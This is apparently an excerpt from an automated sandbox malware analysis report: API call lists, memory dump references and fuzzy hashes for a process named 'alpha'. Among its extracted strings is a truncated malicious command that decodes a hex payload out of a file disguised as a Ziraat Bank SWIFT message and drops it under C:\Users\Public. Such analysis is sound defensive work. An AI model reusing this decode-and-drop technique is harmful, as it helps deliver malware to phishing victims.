                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E09201F0930B81FE183B626C7507A92547F58B60FD81430CD1D06383EF2CA1928730
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 063b3e903279888d6d7b745234a001a688b7cd7982b54247d6f368017d330862
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F01936A18B42C6EA14AB15FC6007AFBA0FF99B40BD99535D94E03358DF3CA442C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 90430df3a5be4bcf1ba3c50f497a30f48f6922419e394205c44485a56069c279
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C01230B08B46C7FB2C7B312CB143A99A57F48211F846838CA0B8A2D2DF2CD8098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $Application$P<dwj`$System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3538039442-1396859947
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD$P<dwj`$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989487059-2735501161
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b937e1f8b9b406542b2eaaecd17132087e1067d9823345af16ee3ae62f70ea2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F1D326B0878682EA20BB15DC652BBE3A0FF45B88F949135CE4E477A5EF3CE445C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3260997497-4031221363
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 82bfcc47faf22433538619e7b0547c552e494b268131d71cf2db7bb0d1e1ffb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED17032A08B4286EB24BB65DC611BFA2A1FF44BA4F945235DA1D477D4DF3CE846C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @P
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1801357106-3670739982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3a5ea9f339798fbd8f372587db7ef8c1cddc2dac312a775404632cd025d0db0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9413B32B04B45DAE710AF61D8642EEABA0FB89B58F844231DA1D43A98DF78D504C750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-4006019111
Similarity
• API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
• String ID:
• API String ID: 3476366620-0
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: P<dwj`
• API String ID: 3541575487-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2149833895-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 031b29f9c3a5ab169ab6a7436925cea4718c6acc008cdbb9a328edb39569137a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42118C226087C28AE7609B10FD503AFEBA0FB84B98F844131DA9D42A55DBBCD449CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF706EBF52A,00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF8FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF96B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBFB14
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBF996
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD41B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD480
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • =,;, xrefs: 00007FF706EBF8C8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes, xrefs: 00007FF706EBF90E
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3964947564-2189690253
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 437f8b7fcf736409396ac7cc20901e166c58cf944e079e5a2b19de2cf122d3e7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE027A35A09B42C6EA18BB21AC701BBF6A5FF54B65FD49235D91E432E4DF3DA402C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e013f4d0c287cbe3ebfa2f1e287e0593fa020df7ca7306767efc87d432fedd09
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2229AA5E0875382FA647B15AD7427BE6A0BF14790FC4A236D99D432E4DF3CE4468730
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: "$=,;$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3545743878-4228052034
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 73fa9e116da620696fffe97e52088c6f91df5c18545e73a04b14457c878b2c5e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8C19065E0976282EB656B119C203BBF6A1FF49F54F85A235CA4E073D8EF3CA445C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P<dwj`$ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-1242007574
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 644a5044fc3c8f07a0ab4ce909b6d37b12d7617ee617ff8dff5f4caccfbfbd2d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05615875A19B4281EA64FB51AC245BBA3A0FF44B88FC8013ADE4D07798DF3DE5418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
